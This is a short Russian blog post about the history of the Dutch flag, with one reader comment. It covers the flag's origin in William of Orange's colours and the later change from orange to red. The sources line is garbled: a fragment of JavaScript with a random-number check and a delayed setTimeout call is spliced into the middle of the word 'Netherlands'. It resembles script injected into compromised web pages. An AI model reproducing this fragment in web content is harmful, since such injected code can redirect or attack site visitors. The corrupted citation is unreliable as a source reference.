Государственные символы: Самый старый триколор

А знаете ли вы, что самым старым флагом-триколором, который до сих пор используется, является флаг Нидерландов. Флаг этот в почти неизменном виде существует с конца XVI века. Конец XVI века – это период борьбы Нижних Стран (так тогда назывались Нидерланды) за свою независимость – от испанского короля Филиппа II. В качестве флага молодого демократического государства было выбрано знамя принца Оранского  – предводителя восстания – с его родовыми цветами: оранжевым, белым и синим. Количество полос на флаге долгое время варьировалось (иногда их число доходило до девяти), порядок тоже.

Со временем оранжевый был заменен в этом флаге на красный. После 1630 года оранжевая полоса стала постепенно выходить из употребления. По одной из наиболее распространенных версий это произошло потому, что сочетание оранжевого с синим гораздо сложнее различить на большом расстоянии, чем красный с синим – а это очень важно в море.

 

Источники: Wikipedia (Flag of the Kingdom of the Netherlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands; Нидерланды).
ЕвропаФлаги
Comments (1)
Add Comment
  • Все к 8 Марта

    Белый и синий – цвета французской монархической династии Оранских (с которой связана династия Нассау – нидерландская королевская семья). Оранжевый как раз происходит от имени династии (Orange). Хотя оранжевый цвет и заменили на красный во флаге, во время государственных праздников, связанных с монархией, или во время государственных визитов к флагу добавляется оранжевый вымпел.